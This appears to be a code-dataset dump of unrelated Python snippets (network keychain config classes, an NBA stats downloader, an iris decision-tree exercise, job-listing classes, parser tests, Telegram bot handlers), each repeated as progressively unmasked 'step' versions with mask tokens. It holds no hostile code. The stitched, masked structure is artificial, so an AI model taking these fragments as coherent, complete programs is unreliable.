KeyIdAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n\n key_id_attr = managedattribute(name='key_id_attr',\n read_only=True,\n doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n\n ms_keychain_attr = managedattribute(\n name='ms_keychain_attr',\n read_only=True,\n doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes,\n parent=self)\n\n # KeyChainTunEncAttributes\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n # KeyIdAttributes\n class KeyIdAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n\n key_id_attr = managedattribute(name='key_id_attr',\n read_only=True,\n doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n\n te_keychain_attr = managedattribute(\n name='te_keychain_attr',\n read_only=True,\n doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes,\n parent=self)\n\n device_attr = managedattribute(name='device_attr',\n read_only=True,\n doc=DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n\n # ============ managedattributes ============#\n key_id = managedattribute(name='key_id',\n default=None,\n type=(None, managedattribute.test_istype(str)),\n doc='Configure a key')\n\n key_enc_type = managedattribute(name='key_enc_type',\n default=None,\n type=managedattribute.test_istype(int),\n doc='Set key encode type')\n\n key_string = managedattribute(name='key_string',\n default=None,\n type=(None,\n managedattribute.test_istype(str)),\n doc='Set key string')\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n\n crypto_algo = managedattribute(\n name='crypto_algo',\n default=None,\n type=(None, CRYPTO_ALGO),\n doc='Set cryptographic authentication algorithm')\n\n lifetime_start = managedattribute(\n name='lifetime_start',\n default=None,\n type=(None, managedattribute.test_istype(str)),\n doc='Set start time for sending lifetime of encryption key')\n\n lifetime_duration = managedattribute(\n name='lifetime_duration',\n default=None,\n type=(None, managedattribute.test_istype(int)),\n doc='Set key lifetime duration')\n\n # =========================================================\n # build_config\n # =========================================================\n def build_config(self,\n devices=None,\n interfaces=None,\n links=None,\n apply=True,\n attributes=None,\n **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n\n devices, interfaces, links = \\\n consolidate_feature_args(self, devices, interfaces, links)\n\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices,\n sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self,\n devices=None,\n interfaces=None,\n links=None,\n apply=True,\n attributes=None,\n **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n\n devices, interfaces, links = \\\n consolidate_feature_args(self, devices, interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices,\n sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
# getting a sample of data to parse for the keys of the players
import requests
import xml.etree.ElementTree as ET
currentPlayerInfoUrl="http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16"
r=requests.get(currentPlayerInfoUrl)
if r.status_code == requests.codes.ok:
with open('currentPlayerDump.json','w') as f:
for line in r.text:
f.write(line)
|
normal
|
{
"blob_id": "68f8b301d86659f9d76de443b0afe93fd7f7e8c2",
"index": 6588,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif r.status_code == requests.codes.ok:\n with open('currentPlayerDump.json', 'w') as f:\n for line in r.text:\n f.write(line)\n",
"step-3": "<mask token>\ncurrentPlayerInfoUrl = (\n 'http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16'\n )\nr = requests.get(currentPlayerInfoUrl)\nif r.status_code == requests.codes.ok:\n with open('currentPlayerDump.json', 'w') as f:\n for line in r.text:\n f.write(line)\n",
"step-4": "import requests\nimport xml.etree.ElementTree as ET\ncurrentPlayerInfoUrl = (\n 'http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16'\n )\nr = requests.get(currentPlayerInfoUrl)\nif r.status_code == requests.codes.ok:\n with open('currentPlayerDump.json', 'w') as f:\n for line in r.text:\n f.write(line)\n",
"step-5": "# getting a sample of data to parse for the keys of the players\nimport requests\nimport xml.etree.ElementTree as ET\n\ncurrentPlayerInfoUrl=\"http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16\"\n\nr=requests.get(currentPlayerInfoUrl)\nif r.status_code == requests.codes.ok:\n\twith open('currentPlayerDump.json','w') as f:\n\t\tfor line in r.text:\n\t\t\tf.write(line)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import cross_val_score
iris_dataset=load_iris()
X=iris_dataset['data']
y=iris_dataset['target']
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.1,stratify=y,random_state=42)
model=[]
for c in range(1,11):
tree=DecisionTreeClassifier(max_depth=4,random_state=c)
model.append(tree.fit(X_train,y_train))
in_sample_accuracy=[]
out_of_sample_accuracy=[]
for a in model:
in_sample_accuracy.append(a.score(X_train,y_train))
out_of_sample_accuracy.append(a.score(X_test,y_test))
a=list(range(1,11))
a.append('mean')
a.append('standard')
in_sample_accuracy.append(np.mean(in_sample_accuracy))
in_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))
out_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))
out_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))
b=pd.DataFrame([in_sample_accuracy,out_of_sample_accuracy,],
columns=a,index=['in_sample_accuracy','out_of_sample_accuracy'])
pd.set_option('precision',3)
b
#cross validation
CVS=[]
score=cross_val_score(DecisionTreeClassifier(max_depth=4),X_train,y_train,cv=10)
CVS.append(score)
pd.set_option('precision',3)
c=pd.DataFrame(CVS,columns=['result1','result2','result3','result4','result5','result6','result7','result8','result9','result 10'],)
c['mean']=c.mean(1)
c['standard']=c.std(1)
dt=DecisionTreeClassifier(max_depth=4)
dt.fit(X_train,y_train)
c['Out-of-sample-accuracy']=dt.score(X_test,y_test)
c
print("My name is Fengkai Xu")
print("My NetID is: fengkai4")
print("I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.")
|
normal
|
{
"blob_id": "cc46485a3b5c68e4f77a2f9a033fd2ee2859b52b",
"index": 978,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor c in range(1, 11):\n tree = DecisionTreeClassifier(max_depth=4, random_state=c)\n model.append(tree.fit(X_train, y_train))\n<mask token>\nfor a in model:\n in_sample_accuracy.append(a.score(X_train, y_train))\n out_of_sample_accuracy.append(a.score(X_test, y_test))\n<mask token>\na.append('mean')\na.append('standard')\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\n<mask token>\npd.set_option('precision', 3)\nb\n<mask token>\nCVS.append(score)\npd.set_option('precision', 3)\n<mask token>\ndt.fit(X_train, y_train)\n<mask token>\nc\nprint('My name is Fengkai Xu')\nprint('My NetID is: fengkai4')\nprint(\n 'I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.'\n )\n",
"step-3": "<mask token>\niris_dataset = load_iris()\nX = iris_dataset['data']\ny = iris_dataset['target']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n stratify=y, random_state=42)\nmodel = []\nfor c in range(1, 11):\n tree = DecisionTreeClassifier(max_depth=4, random_state=c)\n model.append(tree.fit(X_train, y_train))\nin_sample_accuracy = []\nout_of_sample_accuracy = []\nfor a in model:\n in_sample_accuracy.append(a.score(X_train, y_train))\n out_of_sample_accuracy.append(a.score(X_test, y_test))\na = list(range(1, 11))\na.append('mean')\na.append('standard')\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\nb = pd.DataFrame([in_sample_accuracy, out_of_sample_accuracy], columns=a,\n index=['in_sample_accuracy', 'out_of_sample_accuracy'])\npd.set_option('precision', 3)\nb\nCVS = []\nscore = cross_val_score(DecisionTreeClassifier(max_depth=4), X_train,\n y_train, cv=10)\nCVS.append(score)\npd.set_option('precision', 3)\nc = pd.DataFrame(CVS, columns=['result1', 'result2', 'result3', 'result4',\n 'result5', 'result6', 'result7', 'result8', 'result9', 'result 10'])\nc['mean'] = c.mean(1)\nc['standard'] = c.std(1)\ndt = DecisionTreeClassifier(max_depth=4)\ndt.fit(X_train, y_train)\nc['Out-of-sample-accuracy'] = dt.score(X_test, y_test)\nc\nprint('My name is Fengkai Xu')\nprint('My NetID is: fengkai4')\nprint(\n 'I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.'\n )\n",
"step-4": "from sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import cross_val_score\niris_dataset = load_iris()\nX = iris_dataset['data']\ny = iris_dataset['target']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n stratify=y, random_state=42)\nmodel = []\nfor c in range(1, 11):\n tree = DecisionTreeClassifier(max_depth=4, random_state=c)\n model.append(tree.fit(X_train, y_train))\nin_sample_accuracy = []\nout_of_sample_accuracy = []\nfor a in model:\n in_sample_accuracy.append(a.score(X_train, y_train))\n out_of_sample_accuracy.append(a.score(X_test, y_test))\na = list(range(1, 11))\na.append('mean')\na.append('standard')\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\nb = pd.DataFrame([in_sample_accuracy, out_of_sample_accuracy], columns=a,\n index=['in_sample_accuracy', 'out_of_sample_accuracy'])\npd.set_option('precision', 3)\nb\nCVS = []\nscore = cross_val_score(DecisionTreeClassifier(max_depth=4), X_train,\n y_train, cv=10)\nCVS.append(score)\npd.set_option('precision', 3)\nc = pd.DataFrame(CVS, columns=['result1', 'result2', 'result3', 'result4',\n 'result5', 'result6', 'result7', 'result8', 'result9', 'result 10'])\nc['mean'] = c.mean(1)\nc['standard'] = c.std(1)\ndt = DecisionTreeClassifier(max_depth=4)\ndt.fit(X_train, y_train)\nc['Out-of-sample-accuracy'] = dt.score(X_test, y_test)\nc\nprint('My name is Fengkai Xu')\nprint('My NetID is: fengkai4')\nprint(\n 'I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.'\n )\n",
"step-5": "\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.model_selection import cross_val_score\r\niris_dataset=load_iris()\r\nX=iris_dataset['data']\r\ny=iris_dataset['target']\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.1,stratify=y,random_state=42)\r\nmodel=[]\r\nfor c in range(1,11):\r\n tree=DecisionTreeClassifier(max_depth=4,random_state=c)\r\n model.append(tree.fit(X_train,y_train))\r\nin_sample_accuracy=[]\r\nout_of_sample_accuracy=[]\r\nfor a in model:\r\n in_sample_accuracy.append(a.score(X_train,y_train))\r\n out_of_sample_accuracy.append(a.score(X_test,y_test))\r\n\r\na=list(range(1,11))\r\na.append('mean')\r\na.append('standard')\r\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\r\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\r\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\r\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\r\nb=pd.DataFrame([in_sample_accuracy,out_of_sample_accuracy,],\r\n columns=a,index=['in_sample_accuracy','out_of_sample_accuracy'])\r\npd.set_option('precision',3)\r\nb\r\n#cross validation\r\nCVS=[]\r\nscore=cross_val_score(DecisionTreeClassifier(max_depth=4),X_train,y_train,cv=10)\r\nCVS.append(score)\r\npd.set_option('precision',3)\r\nc=pd.DataFrame(CVS,columns=['result1','result2','result3','result4','result5','result6','result7','result8','result9','result 10'],)\r\nc['mean']=c.mean(1)\r\nc['standard']=c.std(1)\r\ndt=DecisionTreeClassifier(max_depth=4)\r\ndt.fit(X_train,y_train)\r\nc['Out-of-sample-accuracy']=dt.score(X_test,y_test)\r\nc\r\nprint(\"My name is Fengkai Xu\")\r\nprint(\"My NetID is: fengkai4\")\r\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('HELLO3')
<|reserved_special_token_1|>
print("HELLO3")
|
flexible
|
{
"blob_id": "74be250df785590ecf45e048b0d6189e2b445889",
"index": 2181,
"step-1": "<mask token>\n",
"step-2": "print('HELLO3')\n",
"step-3": "print(\"HELLO3\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
def __init__(self, name, addr, coord):
self.name = name
self.addr = addr
self.coord = coord
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
def __init__(self, name, addr, coord):
self.name = name
self.addr = addr
self.coord = coord
<|reserved_special_token_0|>
def getTeleString(self):
return '회사명 : ' + self.name + ', 주소 : ' + self.addr
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
def __init__(self, name, addr, coord):
self.name = name
self.addr = addr
self.coord = coord
def getString(self):
return "회사명\n"+self.name+"\n\n주소\n"+self.addr
def getTeleString(self):
return "회사명 : " + self.name + ", 주소 : " + self.addr
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary, url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url=url
self.start = start
self.end = end
def getString(self):
return "공고명 : " + self.name + "\n채용형태 : " + self.type + "\n경력 : " + self.experience + "\n학력 : " + self.education + "\n업무 : " + self.keyword + "\n연봉 : " + self.salary
def getTeleString(self):
return "공고명 : " + self.name
|
flexible
|
{
"blob_id": "bcc24d5f97e46433acb8bcfb08fe582f51eb28ce",
"index": 2932,
"step-1": "<mask token>\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-2": "class Coms:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-3": "class Coms:\n\n def __init__(self, name, addr, coord):\n self.name = name\n self.addr = addr\n self.coord = coord\n <mask token>\n <mask token>\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-4": "class Coms:\n\n def __init__(self, name, addr, coord):\n self.name = name\n self.addr = addr\n self.coord = coord\n <mask token>\n\n def getTeleString(self):\n return '회사명 : ' + self.name + ', 주소 : ' + self.addr\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-5": "class Coms:\n def __init__(self, name, addr, coord):\n self.name = name\n self.addr = addr\n self.coord = coord\n\n def getString(self):\n return \"회사명\\n\"+self.name+\"\\n\\n주소\\n\"+self.addr\n\n def getTeleString(self):\n return \"회사명 : \" + self.name + \", 주소 : \" + self.addr\n\nclass Jobs:\n def __init__(self, name, type, experience, education, keyword, salary, url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url=url\n self.start = start\n self.end = end\n\n def getString(self):\n return \"공고명 : \" + self.name + \"\\n채용형태 : \" + self.type + \"\\n경력 : \" + self.experience + \"\\n학력 : \" + self.education + \"\\n업무 : \" + self.keyword + \"\\n연봉 : \" + self.salary\n\n def getTeleString(self):\n return \"공고명 : \" + self.name",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
class TestParsers(unittest.TestCase):
<|reserved_special_token_0|>
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import crisis.parsers as undertest
import datetime
import unittest
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
"""
Tests for parsers.py
@author Kevin Wilson <[email protected]>
"""
import crisis.parsers as undertest
import datetime
import unittest
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date_short(date))
def test_parse_line(self):
line = ["1","2","3"]
actual = undertest.parse_line(line)
expected = [1,2,3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "253d37f29e33f61d7e1a5ec2f9a1d6307a2ae108",
"index": 6921,
"step-1": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n <mask token>\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport crisis.parsers as undertest\nimport datetime\nimport unittest\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "\"\"\"\nTests for parsers.py\n\n@author Kevin Wilson <[email protected]>\n\"\"\"\nimport crisis.parsers as undertest\n\nimport datetime\nimport unittest\n\nclass TestParsers(unittest.TestCase):\n\tdef test_parse_date(self):\n\t\tdate = '8/5/2013 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date(date))\n\n\tdef test_part_date_short(self):\n\t\tdate = '8/5/13 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date_short(date))\n\n\tdef test_parse_line(self):\n\t\tline = [\"1\",\"2\",\"3\"]\n\t\tactual = undertest.parse_line(line)\n\t\texpected = [1,2,3]\n\t\tself.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\nif __name__ == '__main__':\n\tunittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from pyrogram import Client, filters
from pyrogram.errors import MessageNotModified
from db.models import *
@Client.on_callback_query(filters.regex('^change_lg_'))
async def on_change_language(_, callback):
settings_id = int(callback.data.split('_')[2])
with db_session:
settings = SettingsInstance.get(id=settings_id)
if not settings or not settings.can_edit(callback.db_user):
await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)
return
await callback.answer()
await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))
@Client.on_callback_query(filters.regex('^language_g_'))
async def on_language_selected(_, callback):
data = callback.data.split('_')[2:]
settings_id = int(data[0])
language = '_'.join(data[1:])
with db_session:
settings = SettingsInstance.get(id=settings_id)
if not settings or not settings.can_edit(callback.db_user):
await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)
return
settings.chat.language = language
await callback.answer(settings.chat.get_message('language_selected', flag=settings.chat.get_message('flag')),
show_alert=True)
try:
await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))
except MessageNotModified: # If the user selects the same language he already had
pass
|
normal
|
{
"blob_id": "dd053da45d2577772414b1373ba324b0bfdc0d94",
"index": 6605,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_callback_query(filters.regex('^change_lg_'))\nasync def on_change_language(_, callback):\n settings_id = int(callback.data.split('_')[2])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n await callback.answer()\n await callback.edit_message_text(**languages.create_message_data(\n callback.db_user, settings.chat, settings))\n\n\[email protected]_callback_query(filters.regex('^language_g_'))\nasync def on_language_selected(_, callback):\n data = callback.data.split('_')[2:]\n settings_id = int(data[0])\n language = '_'.join(data[1:])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n settings.chat.language = language\n await callback.answer(settings.chat.get_message('language_selected',\n flag=settings.chat.get_message('flag')), show_alert=True)\n try:\n await callback.edit_message_text(**languages.\n create_message_data(callback.db_user, settings.chat, settings))\n except MessageNotModified:\n pass\n",
